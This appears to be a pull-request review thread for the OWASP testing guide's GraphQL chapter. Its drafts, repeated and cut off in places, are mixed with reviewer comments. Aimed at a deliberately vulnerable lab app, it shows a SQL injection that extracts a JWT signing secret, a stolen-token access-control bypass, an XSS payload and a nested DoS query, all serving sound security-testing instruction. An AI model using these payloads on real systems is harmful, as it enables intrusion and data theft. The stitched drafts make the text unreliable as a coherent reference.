GraphQL API testing guide (#577)
OWASP/wstg: document/4-Web_Application_Security_Testing/12-API_Testing/01-Testing_GraphQL.md

# Testing GraphQL

|ID          |
|------------|

> |WSTG-APIS-01|

Reviewer: @kingthorin I feel like APIT would be a more fitting one? API Testing. What do you think? We need more input on this as well to name our new section :yum:

Reviewer 2: I’m not picky. I don’t think that’s as obvious but I’m also not terribly stuck in it either way.

Author: changed to APIT

## Test Objectives

- Assess that a secure and production-ready configuration is deployed.
- Validate all input fields against generic attacks.
- Ensure that proper access controls are applied.

## How to Test

Testing GraphQL nodes is not very different than testing other API technologies. Consider the following steps:

### Introspection Queries

Introspection queries are the way GraphQL lets you ask what queries are supported, which data types are available, and many more details you will need when approaching a test of a GraphQL deployment.

> "It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the [introspection](https://graphql.org/learn/introspection/) system!"

There are a couple of ways to extract that and visualize the output, as follows.

#### Using Native GraphQL Introspection

The most straight-forward way is to send an HTTP request (using a personal proxy) with the following payload, taken from an article on [Medium](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696):

> ```graphql

Reviewer: @kingthorin We need to see if this should stay as is, or if we create a gist and set these in. That way we'd have them separate and the query gets updated without having the guide updated.

Reviewer 2: I'm fine with it like this. Using s gist see s disjointed to me.

Reviewer: Didn't copy that Alpha, come again. You had a bit of static in that second sentence :p

Reviewer 2: 🤪 fixed

Author: leaving as is for now, if you think we should change it let me know

- ID
- name
- veterinary (ID)  

There is one downside to using this method: GraphQL Voyager does not display everything that can be done with GraphQL, for example, in the drawing above the mutations available are not listed, so the best way would be to use both Voyager and one of the methods listed below.

#### Using GraphiQL

[GraphiQL](https://github.com/graphql/graphiql) is a web-based IDE for GraphQL. It is part of the GraphQL project, and it is mainly used for debugging or development purposes. The best practice is to not allow users to access it on production deployments, however, if you are testing a staging environment you might have access to it and it can save you some time playing around with introspection queries (although you can, of course, use introspection in the GraphiQL interface).

GraphiQL has a docs section, which uses the data from the schema in order to created a documentation of the GraphQL instance that is being used. The documentation contains the data types, mutations, and basically every piece of information that can be extracted using Introspection.

> #### Using GraphQL Playgrounds

Reviewer: The tool is named GraphQL Playground, shouldn't it be without the `s` across the guide?

Reviewer 2: If it's name really doesn't have an `s` then yes, I didn't check.

Author: hmmm I don't know when it was incepted into my brain but fixed now.

> Note that in some cases you will need to set the HTTP headers at the bottom, to include session ID or other mechanism of authentication, but this still allows creating multiple "IDEs" with different permissions to verify if there are in fact authorization issues.

> ![Playgrounds1](images/Playgrounds1.png)\

Reviewer: These need an update as well, if you agree on the figure quotes, update the alt text accordingly and the image names as well.

Author: done

The following query extracts information from the `CONFIG` table within the database:

```graphql
query sqli {
  dogs(namePrefix: "ab%' UNION ALL SELECT 50 AS ID, C.CFGVALUE AS NAME, NULL AS VETERINARY_ID FROM CONFIG C LIMIT ? -- ", limit: 1000) {
    id
    name
  }
}
```

The response to this query is:

```json
{
  "data": {
    "dogs": [
      {
        "id": 1,
        "name": "Abi"
      },
      {
        "id": 2,
        "name": "Abime"
      },
      {
        "id": 3,
        "name": "..."
      },
      {
        "id": 50,
        "name": "$Nf!S?(.}DtV2~:Txw6:?;D!M+Z34^"
      }
    ]
  }
}
```

The query contains the secret which signs JWTs in the example application, which is very sensitive information. Please note that in order to know what to look for you will need to collect information and learn about how the application is built as well as how the database tables are organized. Another thing a tester can do, is use tools like sqlmap to look for injection paths, and even automate the extraction of data from the database.

#### Cross-Site Scripting (XSS)

> Cross-Site scripting occurs when the browser treats data that should be displayed as code that should be executed, creating the opportunity to run malicious code in a user's browser. Reflection of input might cause XSS, but that is up to how the application is implemented, whether in encodes the output, so the best practice would be to test for XSS using a payload from [Testing for Reflected Cross Site Scripting](../07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md). As noted, GraphQL only creates another layer on top of the application, so other tests from WSTG might be useful.

Reviewer: That end note in this line should be used for the injection section as a whole, not in this particular sub-section.

Author: I've moved it to the general injection section.

Payload:

```graphql
query xss  {
  myInfo(veterinaryId:"<script>alert('1')</script>" ,accessToken:"<script>alert('1')</script>") {
    id
    name
  }
}
```

Response:

```json
{
  "data": null,
  "errors": [
    {
      "message": "Validation error of type WrongType: argument 'veterinaryId' with value 'StringValue{value='<script>alert('1')</script>'}' is not a valid 'Int' @ 'myInfo'",
      "locations": [
        {
          "line": 2,
          "column": 10,
          "sourceName": null
        }
      ],
      "description": "argument 'veterinaryId' with value 'StringValue{value='<script>alert('1')</script>'}' is not a valid 'Int'",
      "validationErrorType": "WrongType",
      "queryPath": [
        "myInfo"
      ],
      "errorType": "ValidationError",
      "extensions": null,
      "path": null
    }
  ]
}
```

> Note: There are also scalars in GraphQL, which are usually used for custom data types which do not have native data types (DateTime for example). These types of data do not have out of the box validation as well, and you should look at them as well while testing.

> ### Abusive Queries

Reviewer: I see that abusive might be a bit "vague". All testing queries are to some degree abusive. Maybe we can just reference this as DoS Queries?

Author: I see your point, I'll change it to DoS since that is exactly what they try to cause.

Author: Also, I'll implement RiieCco's comment on referencing the graphql voyager for nested objects.

# Testing GraphQL

|ID          |
|------------|
|WSTG-APIS-01|

## Summary

> GraphQL has become very popular in modern APIs. It provides simplicity, and nested objects, which facilitate faster development.  
> Every technology, while having advantages can also expose the application to new attack surfaces.
> The purpose of this scenario is to provide some common misconfigurations and attack vectors on applications which utilize GraphQL.  
> Some vectors are unique to GraphQL (Introspection Query for example) and some are not (SQL Injection for example).

Reviewer 2: ```suggestion
GraphQL has become very popular in modern APIs. It provides simplicity, and nested objects, which facilitate faster development. Every technology, while having advantages can also expose the application to new attack surfaces. The purpose of this scenario is to provide some common misconfigurations and attack vectors on applications which utilize GraphQL. Some vectors are unique to GraphQL (Introspection Query for example) and some are not (SQL Injection for example).
```

Examples in this section will be based on a vulnerable GraphQL application [poc-graphql](https://github.com/righettod/poc-graphql), which is run in a docker container which maps `localhost:8080/GraphQL` as the vulnerable GraphQL node.

## Test Objectives

Assess GraphQL's security configuration, as well as other common vulnerabilities which might affect GraphQL deployments.

## How to Test

Testing GraphQL nodes is not very different than testing other API technologies. Consider the following steps:

### Introspection Queries

Introspection queries are the way GraphQL lets you ask what queries are supported, which data types are available, and many more details you will need when approaching a test of a GraphQL deployment.

> > "It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the [introspection](https://graphql.org/learn/introspection/) system!"
> There are a couple of ways to extract that and visualize the output:

Reviewer 2: ```suggestion
> "It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the [introspection](https://graphql.org/learn/introspection/) system!"

There are a couple of ways to extract that and visualize the output, as follows.
```

#### Using Native GraphQL Introspection

> The most straight-forward way is to send an HTTP request (using a proxy like Burp) with the following payload, taken from an article on [Medium](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) :

Reviewer 2: ```suggestion
The most straight-forward way is to send an HTTP request (using a personal proxy) with the following payload, taken from an article on [Medium](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) :
```

          "enumValues": [
            {
              "name": "SCALAR",
              "description": "Indicates this type is a scalar.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "OBJECT",
              "description": "Indicates this type is an object. `fields` and `interfaces` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "INTERFACE",
              "description": "Indicates this type is an interface. `fields` and `possibleTypes` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "UNION",
              "description": "Indicates this type is a union. `possibleTypes` is a valid field.",
              "isDeprecated": false,
              "deprecationReason": null
            },
          ],
          "possibleTypes": null
        }
      ]
    }
  }
}
```

A tool such as GraphQL Voyager can be used to get a better understanding of the GraphQL endpoint:

![GraphQL Voyager](images/Voyager.png)

> This tool creates an Entity Relationship Diagram (ERD) representation of the GraphQL schema, allowing you to get a better look into the moving parts of the system you're testing.  
> Extracting information from the drawing allows you to see you can query the dogs table for example. It also shows which properties a "dog" has:

Reviewer 2: ```suggestion
This tool creates an Entity Relationship Diagram (ERD) representation of the GraphQL schema, allowing you to get a better look into the moving parts of the system you're testing. Extracting information from the drawing allows you to see you can query the dogs table for example. It also shows which properties a "dog" has:
```

- ID
- name
- veterinary (ID)  

There is one downside to using this method: GraphQL Voyager does not display everything that can be done with GraphQL, for example, in the drawing above the mutations available are not listed, so the best way would be to use both Voyager and one of the methods listed below.

#### Using GraphiQL

> GraphiQL is a web-based IDE for GraphQL. It is part of the GraphQL project, and it is mainly used for debugging or development purposes.  
> The best practice is to not allow users to access it on production deployments, however, if you are testing a staging environment you might have access to it and it can save you some time playing around with introspection queries (although you can, of course, use introspection in the GraphiQL interface).
> 
> GraphiQL has a docs section, which uses the data from the schema in order to created a documentation of the GraphQL instance that is being used.
> 
> The documentation contains the data types, mutations, and basically every piece of information you can extract using Introspection.

Reviewer 2: ```suggestion
GraphiQL is a web-based IDE for GraphQL. It is part of the GraphQL project, and it is mainly used for debugging or development purposes. The best practice is to not allow users to access it on production deployments, however, if you are testing a staging environment you might have access to it and it can save you some time playing around with introspection queries (although you can, of course, use introspection in the GraphiQL interface).

GraphiQL has a docs section, which uses the data from the schema in order to created a documentation of the GraphQL instance that is being used. The documentation contains the data types, mutations, and basically every piece of information that can be extracted using Introspection.
```

#### Using GraphQL Playgrounds

> GraphQL Playgrounds is a GraphQL client, which can be used to test different queries, as well as dividing GraphQL IDEs into different playgrounds, grouped by theme or by assigning a name to them.  
> Much like GraphiQL, Playgrounds can create documentation for you, without the need for manually sending introspection queries and processing the response(s) but with one great advantage, it doesn't need GraphiQL interface to be available.  
> Another upside for this tool, is that it works just by directing the tool to the GraphQL node via a URL (there is also the option of using it locally with the data file) and then the magic happens without any user interaction.  
> GraphQL Playgrounds can be used to test for vulnerabilities directly, you don't need to use a personal proxy to send HTTP requests, and so you can use this tool in order to interact and asses GraphQL and use a personal proxy for other, more advanced payloads.  
> Note that in some cases you will need to set the HTTP headers at the bottom, to include session ID or other mechanism of authentication, but this still allows creating multiple "IDEs" with different permissions to verify if there are in fact authorization issues.
> 

Reviewer 2: ```suggestion
GraphQL Playgrounds is a GraphQL client, which can be used to test different queries, as well as dividing GraphQL IDEs into different playgrounds, grouped by theme or by assigning a name to them. Much like GraphiQL, Playgrounds can create documentation for you, without the need for manually sending introspection queries and processing the response(s) but with one great advantage, it doesn't need GraphiQL interface to be available. Another upside for this tool, is that it works just by directing the tool to the GraphQL node via a URL (there is also the option of using it locally with the data file) and then the magic happens without any user interaction. GraphQL Playgrounds can be used to test for vulnerabilities directly, you don't need to use a personal proxy to send HTTP requests, and so you can use this tool in order to interact and asses GraphQL and use a personal proxy for other, more advanced payloads.  

> Note that in some cases you will need to set the HTTP headers at the bottom, to include session ID or other mechanism of authentication, but this still allows creating multiple "IDEs" with different permissions to verify if there are in fact authorization issues.

```

![Playgrounds1](images/Playgrounds1.png)
![Playgrounds2](images/Playgrounds2.png)

You can even download the schemas to use in Voyager.

#### Introspection Conclusion

> Introspection is a useful tool which allows users to gain more information about the GraphQL deployment, however, this will also allow malicious users to gain access to the same information.  
> The best practice is to limit the access to the introspection queries, since, some tools or requests might fail if this feature is disabled altogether.  
> Since GraphQL is usually bridges to the backend APIs of the system, its better to enforce strict access control, which leads to the next topic.

Reviewer 2: ```suggestion
Introspection is a useful tool which allows users to gain more information about the GraphQL deployment, however, this will also allow malicious users to gain access to the same information. Best practice is to limit the access to the introspection queries, since, some tools or requests might fail if this feature is disabled altogether. Since GraphQL usually bridges to the backend APIs of the system, its better to enforce strict access control, which leads to the next topic.
```

### Authorization

> Introspection is the first place to look for Authorization problems. As noted, introspection should be restricted since it allows for data extraction and data gathering.  
> The next thing you should check, once you have access to the schema and know what sensitive information there is to extract, is sending queries which will not be blocked due to insufficient privileges. GraphQL does not enforce permissions by default, and so it is up to the application to perform authorization enforcement.

Reviewer 2: ```suggestion
Introspection is the first place to look for Authorization problems. As noted, introspection should be restricted since it allows for data extraction and data gathering. The next thing a tester should check, once they have access to the schema and know what sensitive information there is to extract, is sending queries which will not be blocked due to insufficient privileges. GraphQL does not enforce permissions by default, and so it is up to the application to perform authorization enforcement.
```

In the earlier examples the output of the introspection query, shows there is a query called `auth`, which seems like a good place to extract sensitive information (API tokens, passwords, etc).

![auth1](images/auth1.png)

> Testing the authorization implementation varies from deployment to deployment since each schema will have different sensitive information, and hence, different targets to focus on.  
> In this example, every user (even un-authenticated) can gain access to auth tokens of every veterinarian listed in the database. These tokens can be used to perform additional actions the schema allows, such as associate or disassociate a dog from any specified veterinarian (using mutations), while there is no matching of the auth token to the veterinarian which appears in the request. An example would be, to use the token that was extracted (which belongs to Julien), and use it to perform an action as Benoit, which has the number 2 ID.

Reviewer 2: ```suggestion
Testing the authorization implementation varies from deployment to deployment since each schema will have different sensitive information, and hence, different targets to focus on. In this example, every user (even un-authenticated) can gain access to auth tokens of every veterinarian listed in the database. These tokens can be used to perform additional actions the schema allows, such as associating or disassociating a dog from any specified veterinarian (using mutations), while there is no matching of the auth token to the veterinarian which appears in the request. An example would be, to use the token that was extracted (which belongs to Julien), and use it to perform an action as Benoit, who has the number 2 ID.
```

```json
query brokenAccessControl {
  myInfo(accessToken:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJwb2MiLCJzdWIiOiJKdWxpZW4iLCJpc3MiOiJBdXRoU3lzdGVtIiwiZXhwIjoxNjAzMjkxMDE2fQ.r3r0hRX_t7YLiZ2c2NronQ0eJp8fSs-sOUpLyK844ew", veterinaryId: 2){
    id, name, dogs {
      name
    }
  }
}
```

And the response:

```json
{
  "data": {
    "myInfo": {
      "id": 2,
      "name": "Benoit",
      "dogs": [
        {
          "name": "Babou"
        },
        {
          "name": "Baboune"
        },
        {
          "name": "Babylon"
        },
        {
          "name": "..."
        }
      ]
    }
  }
}
```

All of the dogs in the list belong to Benoit and not to the veterinarian which sent the request (and owns the auth token).

### Injection

GraphQL is the implementation of the API layer of an application, and as such, it usually forwards the requests to a backend API or the database directly. This allows you to utilize any underlying vulnerability such as SQL injection, command injection, cross-site scripting, and basically, everything you expect to find in web applications, using GraphQL just changes the entry point of the malicious payload.

> You can refer to other guides within the OWASP testing guide to get some ideas.

Reviewer 2: ```suggestion
You can refer to other scenarios within the OWASP testing guide to get some ideas.
```

#### SQL Injection

> The example application is vulnerable by design in the query `dogs(namePrefix: String, limit: Int = 500): [Dog!]`  since the parameter "namePrefix" is concatenated in the SQL query. Concatenating user input is a common malpractice of applications which exposes them to SQL injection.

Reviewer 2: ```suggestion
The example application is vulnerable by design in the query `dogs(namePrefix: String, limit: Int = 500): [Dog!]`  since the parameter `namePrefix` is concatenated in the SQL query. Concatenating user input is a common malpractice of applications which exposes them to SQL injection.
```

> The following query extracts information from the CONFIG table within the database:

Reviewer 2: ```suggestion
The following query extracts information from the `CONFIG` table within the database:
```

```graphql
query sqli {
  dogs(namePrefix: "ab%' UNION ALL SELECT 50 AS ID, C.CFGVALUE AS NAME, NULL AS VETERINARY_ID FROM CONFIG C LIMIT ? -- ", limit: 1000) {
    id
    name
  }
}
```

The response to this query is:

```json
{
  "data": {
    "dogs": [
      {
        "id": 1,
        "name": "Abi"
      },
      {
        "id": 2,
        "name": "Abime"
      },
      {
        "id": 50,
        "name": "$Nf!S?(.}DtV2~:Txw6:?;D!M+Z34^"
      }
    ]
  }
}
```

> The query contains the secret which signs JWTs in the example application, which is very sensitive information. Please note that in order to know what to look for you will need to collect information and learn about how the application is built as well as how the database tables are organized.  
> Another thing you can do, is use tools like sqlmap to look for injection paths and even automate the extraction of data from the database.

Reviewer 2: ```suggestion
The query contains the secret which signs JWTs in the example application, which is very sensitive information. Please note that in order to know what to look for you will need to collect information and learn about how the application is built as well as how the database tables are organized. Another thing a tester can do, is use tools like sqlmap to look for injection paths, and even automate the extraction of data from the database.
```

#### Cross-Site Scripting (XSS)

> Cross-Site scripting occurs when the browser treats data that should be displayed as code that should be executed, creating the opportunity to run malicious code in a user's browser.  
> Reflection of input might cause XSS, but that is up to how the application is implemented, whether in encodes the output, so the best practice would be to test for XSS using a payload from [Testing for Reflected Cross Site Scripting](../07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md).  
> As noted, GraphQL only creates another layer on top of the application, so other tests from WSTG might be useful.

Reviewer 2: ```suggestion
Cross-Site scripting occurs when the browser treats data that should be displayed as code that should be executed, creating the opportunity to run malicious code in a user's browser. Reflection of input might cause XSS, but that is up to how the application is implemented, whether in encodes the output, so the best practice would be to test for XSS using a payload from [Testing for Reflected Cross Site Scripting](../07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md). As noted, GraphQL only creates another layer on top of the application, so other tests from WSTG might be useful.
```

In this example, errors might reflect the input at times, and in case the application reflects the errors to the users, XSS might occur.

Payload:

```graphql
query xss  {
  myInfo(veterinaryId:"<script>alert('1')</script>" ,accessToken:"<script>alert('1')</script>") {
    id
    name
  }
}
```

Response:

```json
{
  "data": null,
  "errors": [
    {
      "message": "Validation error of type WrongType: argument 'veterinaryId' with value 'StringValue{value='<script>alert('1')</script>'}' is not a valid 'Int' @ 'myInfo'",
      "locations": [
        {
          "line": 2,
          "column": 10,
          "sourceName": null
        }
      ],
      "description": "argument 'veterinaryId' with value 'StringValue{value='<script>alert('1')</script>'}' is not a valid 'Int'",
      "validationErrorType": "WrongType",
      "queryPath": [
        "myInfo"
      ],
      "errorType": "ValidationError",
      "extensions": null,
      "path": null
    }
  ]
}
```

> **Note**: There are also scalars in GraphQL, which are usually used for custom data types which do not have native data types (DateTime for example). These types of data do not have out of the box validation as well, and you should look at them as well while testing.

Reviewer 2: ```suggestion
> Note: There are also scalars in GraphQL, which are usually used for custom data types which do not have native data types (DateTime for example). These types of data do not have out of the box validation as well, and you should look at them as well while testing.
```

In the example application, a "dog" has a reference to a veterinary which also have a reference to a dog. This allows for a deep query which will overload the application:

```graphql
query dos {
  allDogs(onlyFree: false, limit: 1000000) {
    id
    name
    veterinary {
      id
      name
      dogs {
        id
        name
        veterinary {
          id
          name
          dogs {
            id
            name
            veterinary {
              id
              name
              dogs {
                id
                name
                veterinary {
                  id
                  name
                  dogs {
                    id
                    name
                    veterinary {
                      id
                      name
                      dogs {
                        id
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
```

> There a multiple security measures which can be implemented to prevent these types of queries, which will be listed in the remediation section.
> 
> Abusive queries can cause issues like DoS for GraphQL deployments and hence, should be tested as part of a security test for GraphQL deployments.

Reviewer 2: ```suggestion
There a multiple security measures which can be implemented to prevent these types of queries, which will be listed in the remediation section. Abusive queries can cause issues like DoS for GraphQL deployments and hence, should be tested as part of a security test for GraphQL deployments.
```

### Detailed Error Message

> GraphQL can encounter unexpected errors during runtime. While an error like that occurs, the server sends an error specifying that, which can reveal internal error or application configuration/data/assets, allowing a malicious user to acquire more information on the application.  
> As part of the testing, error messages should be checked, by sending unexpected data, and the responses should be searched for additional information which might be revealed using this technique.

Reviewer 2: ```suggestion
GraphQL can encounter unexpected errors during runtime. When an error like that occurs, the server may send an error response, which can reveal internal error details or application configuration/data/assets, allowing a malicious user to acquire more information on the application. As part of the testing, error messages should be checked, by sending unexpected data, and the responses should be searched for additional information which might be revealed using this technique.
```

## Test Objectives

Assess GraphQL's security configuration, as well as other common vulnerabilities which might affect GraphQL deployments.

## How to Test

Testing GraphQL nodes is not very different than testing other API technologies. This Guide suggests following these steps:

### Introspection Queries

A little bit of background:
"It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the introspection system!"
[GraphQL.org-Introspection](https://graphql.org/learn/introspection/)
Introspection queries are the way GraphQL lets you ask it what queries it supports, which data types are available, and many more details you will need when approaching to test a GraphQL deployment. This is a good starting point on the information gathering phase.

There are a couple of ways to extract that and visualize the output:

#### Using Native GraphQL Introspection

The most straight-forward way is to send an HTTP request (using a proxy like Burp) with the following payload :

> ```graphql

Author: It's actually from [Medium](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) and I added it to the references section as well as a link before the payload itself.

        ...InputValue
      }
    }
  }
}
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}
```

The result will usually be very long (and hence will be shorted here), and it will contain the entire scheme of the GraphQL deployment.  

Response:

> ```json

Author: I can also write down the full reply (but it was REALLY long that's why I tried shorting it). Let me know if you want me to do that if there isn't a quick fix for closing jsons at the moment.

> ```json

Author: So, for the update to the PR I will push in a minute, I closed the brackets so the JSON will actually be properly closed, even though it lacks a lot of the response (in length). If you think we should put the entire response I can do that as well, just ping me.

              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "UNION",
              "description": "Indicates this type is a union. `possibleTypes` is a valid field.",
              "isDeprecated": false,
              "deprecationReason": null
            },
          ],
          "possibleTypes": null

        {
```

Now use GraphQL Voyager to get a better look on the output:

![GraphQL Voyager](images/Voyager.png)

This tool creates an ERD representation of the GraphQL scheme, allowing you to get a better look into the moving parts of the system you're testing.  
Extracting information from the drawing allows you to see you can query the dogs table for example. It also shows which properties a "dog" has:

- ID
- name
- veterinary (ID)  

There is one downside to using this method, GraphQL Voyager does not display everything that can be done with GraphQL, for example, in the drawing above the mutations available are not listed, so the best way would be to use both Voyager and one of the methods listed below.

> #### Using the GraphiQL

Author: OK that actually sounds good to me. I was worried that the images will take up the entire page (that's why I first implemented them using plain HTML). I'll delete it and write down exactly what you say, it is already referenced.

The best practice is to limit the access to the introspection queries, since, some tools or requests might fail if this feature is disabled altogether.  
Since GraphQL is usually bridges to the backend APIs of the system, its better to enforce strict access control, which leads to the next topic.

### Authorization

The first part, referring to introspection, is the first place to look for Authorization problems. As noted, introspection should be restricted since it allows for data extraction and data gathering.  
The next thing you should check, once you have access to the scheme and know what sensitive information there is to extract, is sending queries which will not be blocked due to insufficient privileges.  

In the example GraphQL that is being used in this guide, the output of the introspection query, shows there is a query called auth, which seems like a good place to extract sensitive information (API tokens, passwords, etc').

![auth1](images/auth1.png)

Testing the authorization implementation varies from deployment to deployment since each scheme will have different sensitive information's, and hence, different targets to focus on.  

> In this example, every user (even un-authenticated) can gain access to auth tokens of every veterinarian listed in the database. These tokens can be used to perform additional actions the scheme allows, such as associate or disassociate a dog from a specified veterinarian (using mutations).

Author: I fixed the text as well as added the example to let the readers understand that the tokens and the request do not match.

          "fields": null,
          "inputFields": null,
          "interfaces": null,
          "enumValues": [
            {
              "name": "SCALAR",
              "description": "Indicates this type is a scalar.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "OBJECT",
              "description": "Indicates this type is an object. `fields` and `interfaces` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "INTERFACE",
              "description": "Indicates this type is an interface. `fields` and `possibleTypes` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "UNION",
              "description": "Indicates this type is a union. `possibleTypes` is a valid field.",
              "isDeprecated": false,
              "deprecationReason": null
            },
          ],
          "possibleTypes": null
        }
      ]
    }
  }
}
```

> A tool such as GraphQL Voyager can be used to get a better understanding of the GraphQL endpoint:

Reviewer 3: A link to this tool would be nice.

Reviewer 2: It's in the "Tools" section isn't it?

Reviewer 3: I meant an inline link here, but it isn't in the tools section either.

Author: My bad, added it both inline and in the tools section.

Author: Added thanks for catching this.

- ID
- name
- veterinary (ID)  

There is one downside to using this method: GraphQL Voyager does not display everything that can be done with GraphQL, for example, in the drawing above the mutations available are not listed, so the best way would be to use both Voyager and one of the methods listed below.

#### Using GraphiQL

[GraphiQL](https://github.com/graphql/graphiql) is a web-based IDE for GraphQL. It is part of the GraphQL project, and it is mainly used for debugging or development purposes. The best practice is to not allow users to access it on production deployments, however, if you are testing a staging environment you might have access to it and it can save you some time playing around with introspection queries (although you can, of course, use introspection in the GraphiQL interface).

GraphiQL has a docs section, which uses the data from the schema in order to created a documentation of the GraphQL instance that is being used. The documentation contains the data types, mutations, and basically every piece of information that can be extracted using Introspection.

#### Using GraphQL Playground

> [GraphQL Playground](https://github.com/graphql/graphql-playground) is a GraphQL client, which can be used to test different queries, as well as dividing GraphQL IDEs into different playground, grouped by theme or by assigning a name to them. Much like GraphiQL, Playground can create documentation for you, without the need for manually sending introspection queries and processing the response(s) but with one great advantage, it doesn't need GraphiQL interface to be available. Another upside for this tool, is that it works just by directing the tool to the GraphQL node via a URL (there is also the option of using it locally with the data file) and then the magic happens without any user interaction. GraphQL Playground can be used to test for vulnerabilities directly, you don't need to use a personal proxy to send HTTP requests, and so you can use this tool in order to interact and asses GraphQL and use a personal proxy for other, more advanced payloads.

Reviewer 3: Some wording and punctuation changes.

```suggestion
[GraphQL Playground](https://github.com/graphql/graphql-playground) is a GraphQL client, which can be used to test different queries, as well as dividing GraphQL IDEs into different playgrounds, grouped by theme or by assigning a name to them. Much like GraphiQL, Playground can create documentation for you without the need for manually sending introspection queries and processing the response(s), but with one great advantage: it doesn't need the GraphiQL interface to be available. Another upside for this tool is that it works just by directing the tool to the GraphQL node via a URL (there is also the option of using it locally with the data file) and then the magic happens without any user interaction. GraphQL Playground can be used to test for vulnerabilities directly, so you don't need to use a personal proxy to send HTTP requests. This means you can use this tool for simple interaction with and assessment of GraphQL but turn to a personal proxy for other, more advanced payloads.
```

Reviewer 2: Good suggestion. I've tweaked your colon change to be followed by a capital.

Examples in this section will be based on a vulnerable GraphQL application [poc-graphql](https://github.com/righettod/poc-graphql), which is run in a docker container which maps `localhost:8080/GraphQL` as the vulnerable GraphQL node.

## Test Objectives

- Assess that a secure and production-ready configuration is deployed.
- Validate all input fields against generic attacks.
- Ensure that proper access controls are applied.

## How to Test

Testing GraphQL nodes is not very different than testing other API technologies. Consider the following steps:

### Introspection Queries

Introspection queries are the way GraphQL lets you ask what queries are supported, which data types are available, and many more details you will need when approaching a test of a GraphQL deployment.

> > "It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the [introspection](https://graphql.org/learn/introspection/) system!"

Author: From the graphql.org site, the link is on the word introspection and it is the sentence which starts the introspection info page.

> > "It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the [introspection](https://graphql.org/learn/introspection/) system!"

Reviewer 4: ```suggestion

Introspection queries are the way GraphQL lets you ask what queries are supported, which data types are available, and many more details you will need when approaching a test of a GraphQL deployment.

The [GraphQL website describes Introspection](https://graphql.org/learn/introspection/):

Examples in this section will be based on a vulnerable GraphQL application [poc-graphql](https://github.com/righettod/poc-graphql), which is run in a docker container that maps `localhost:8080/GraphQL` as the vulnerable GraphQL node.

## Test Objectives

- Assess that a secure and production-ready configuration is deployed.
- Validate all input fields against generic attacks.
- Ensure that proper access controls are applied.

## How to Test

Testing GraphQL nodes is not very different than testing other API technologies. Consider the following steps:

### Introspection Queries

Introspection queries are the method by which GraphQL lets you ask what queries are supported, which data types are available, and many more details you will need when approaching a test of a GraphQL deployment.

> "It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the [introspection](https://graphql.org/learn/introspection/) system!"

There are a couple of ways to extract this information and visualize the output, as follows.

#### Using Native GraphQL Introspection

> The most straightforward way is to send an HTTP request (using a personal proxy) with the following payload, taken from an article on [Medium](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696):

Reviewer 4: Do we have permission from the original source to include this?

Reviewer: The medium article is referenced, and the content below is not just simply snatched, which makes this okay and not violating that person's article.

Author: I'm leaving these 2 comments unresolved, if there is anything else I need to do, ping me. For the time being, I've deleted WAF from the file, and pushing the latest version.

            {
              "name": "SCALAR",
              "description": "Indicates this type is a scalar.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "OBJECT",
              "description": "Indicates this type is an object. `fields` and `interfaces` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "INTERFACE",
              "description": "Indicates this type is an interface. `fields` and `possibleTypes` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "UNION",
              "description": "Indicates this type is a union. `possibleTypes` is a valid field.",
              "isDeprecated": false,
              "deprecationReason": null
            },
          ],
          "possibleTypes": null
        }
      ]
    }
  }
}
```

A tool such as [GraphQL Voyager](https://apis.guru/graphql-voyager/) can be used to get a better understanding of the GraphQL endpoint:

![GraphQL Voyager](images/Voyager.png)\

> _Figure 12.1-1: GraphQL Voyager_

Reviewer 5: *Figure 12.1-1: GraphQL Voyager*

#### Using GraphQL Playground

